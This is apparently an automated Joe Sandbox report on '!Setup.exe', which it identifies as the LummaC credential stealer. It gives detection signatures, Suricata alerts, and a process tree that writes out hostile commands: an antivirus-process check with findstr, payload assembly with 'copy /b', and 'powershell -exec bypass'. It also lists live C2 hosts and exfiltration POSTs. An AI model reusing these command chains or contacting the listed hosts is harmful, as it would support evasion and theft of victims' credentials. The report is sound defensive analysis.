Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
!Setup.exe

Overview

General Information

Sample name:!Setup.exe
Analysis ID:1581738
MD5:cb8f02134e7a9e082e0d9bf4c988b202
SHA1:c4a32f3385e1b91d135d2f713779299bdb6d0ab0
SHA256:2b5fdba3647700d3dde718e3b43fde8c12f3425d0ab768d446450deeb1a3de33
Tags:exeuser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Drops PE files with a suspicious file extension
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • !Setup.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\!Setup.exe" MD5: CB8F02134E7A9E082E0D9BF4C988B202)
    • cmd.exe (PID: 7528 cmdline: "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7616 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7624 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7668 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7676 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7712 cmdline: cmd /c md 71992 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7728 cmdline: extrac32 /Y /E Ec MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7752 cmdline: findstr /V "Ratio" Returning MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7768 cmdline: cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7784 cmdline: cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Banned.com (PID: 7800 cmdline: Banned.com V MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 1852 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7820 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 7800, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", ProcessId: 1852, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 7800, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", ProcessId: 1852, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 7800, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", ProcessId: 1852, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 7800, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", ProcessId: 1852, ProcessName: powershell.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7528, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7676, ProcessName: findstr.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T21:35:52.982519+010020283713Unknown Traffic192.168.2.449737104.21.37.209443TCP
      2024-12-28T21:35:55.105526+010020283713Unknown Traffic192.168.2.449738104.21.37.209443TCP
      2024-12-28T21:35:57.741369+010020283713Unknown Traffic192.168.2.449740104.21.37.209443TCP
      2024-12-28T21:36:00.002405+010020283713Unknown Traffic192.168.2.449747104.21.37.209443TCP
      2024-12-28T21:36:02.211154+010020283713Unknown Traffic192.168.2.449753104.21.37.209443TCP
      2024-12-28T21:36:04.685957+010020283713Unknown Traffic192.168.2.449759104.21.37.209443TCP
      2024-12-28T21:36:07.125925+010020283713Unknown Traffic192.168.2.449765104.21.37.209443TCP
      2024-12-28T21:36:10.815856+010020283713Unknown Traffic192.168.2.449774104.21.37.209443TCP
      2024-12-28T21:36:13.030490+010020283713Unknown Traffic192.168.2.449779104.26.3.16443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T21:35:53.839595+010020546531A Network Trojan was detected192.168.2.449737104.21.37.209443TCP
      2024-12-28T21:35:55.897918+010020546531A Network Trojan was detected192.168.2.449738104.21.37.209443TCP
      2024-12-28T21:36:11.594130+010020546531A Network Trojan was detected192.168.2.449774104.21.37.209443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T21:35:53.839595+010020498361A Network Trojan was detected192.168.2.449737104.21.37.209443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T21:35:55.897918+010020498121A Network Trojan was detected192.168.2.449738104.21.37.209443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T21:36:05.504971+010020480941Malware Command and Control Activity Detected192.168.2.449759104.21.37.209443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: !Setup.exeReversingLabs: Detection: 27%
      Source: !Setup.exeVirustotal: Detection: 16%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
      Source: !Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49779 version: TLS 1.2
      Source: !Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49774 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49759 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.37.209:443
      Source: unknownDNS query: name: rentry.co
      Source: Joe Sandbox ViewIP Address: 104.21.37.209 104.21.37.209
      Source: Joe Sandbox ViewIP Address: 104.26.3.16 104.26.3.16
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49759 -> 104.21.37.209:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49779 -> 104.26.3.16:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49774 -> 104.21.37.209:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AQ4D61LZJFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18117Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WUB58VWQQVKXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8750Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B9W5VFRBJ5VK1I4ECJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20445Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A34H4KFN0QJ82PVOT8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z0LWSW34GXQ8HPHCEWPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 554711Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
      Source: global trafficDNS traffic detected: DNS query: xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi
      Source: global trafficDNS traffic detected: DNS query: fallyjustif.click
      Source: global trafficDNS traffic detected: DNS query: rentry.co
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fallyjustif.click
      Source: !Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: !Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
      Source: !Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: !Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: !Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Banned.com.1.dr, Writing.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Banned.com.1.dr, Ford.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Banned.com.1.dr, Writing.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Banned.com.1.dr, Ford.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Banned.com.1.dr, Writing.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: !Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: !Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: !Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: !Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: !Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: !Setup.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: !Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: !Setup.exeString found in binary or memory: http://ocsp.digicert.com0
      Source: !Setup.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: !Setup.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: !Setup.exeString found in binary or memory: http://ocsp.digicert.com0I
      Source: !Setup.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Banned.com.1.dr, Writing.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: Banned.com.1.dr, Ford.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Banned.com.1.dr, Ford.8.dr, Writing.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Banned.com.1.dr, Writing.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: powershell.exe, 00000011.00000002.2437679697.0000000004661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Banned.com.1.dr, Ford.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Banned.com.1.dr, Writing.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: Banned.com, 0000000C.00000000.1737418139.0000000000275000.00000002.00000001.01000000.00000007.sdmp, Banned.com.1.dr, Ford.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: !Setup.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: !Setup.exeString found in binary or memory: http://www.teamviewer.com
      Source: powershell.exe, 00000011.00000002.2437679697.0000000004661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
      Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.000000000499C000.00000004.00000800.00020000.00000000.sdmp, 9OMAF2HFFRD0LNMKR.ps1.12.drString found in binary or memory: https://rentry.co/
      Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/hZ
      Source: 9OMAF2HFFRD0LNMKR.ps1.12.drString found in binary or memory: https://rentry.co/static/icons/512.png
      Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.pnghZ
      Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.000000000499C000.00000004.00000800.00020000.00000000.sdmp, 9OMAF2HFFRD0LNMKR.ps1.12.drString found in binary or memory: https://rentry.co/what
      Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/whathZ
      Source: Banned.com.1.dr, Writing.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Writing.8.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.000000000499C000.00000004.00000800.00020000.00000000.sdmp, 9OMAF2HFFRD0LNMKR.ps1.12.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49779 version: TLS 1.2
      Source: C:\Users\user\Desktop\!Setup.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
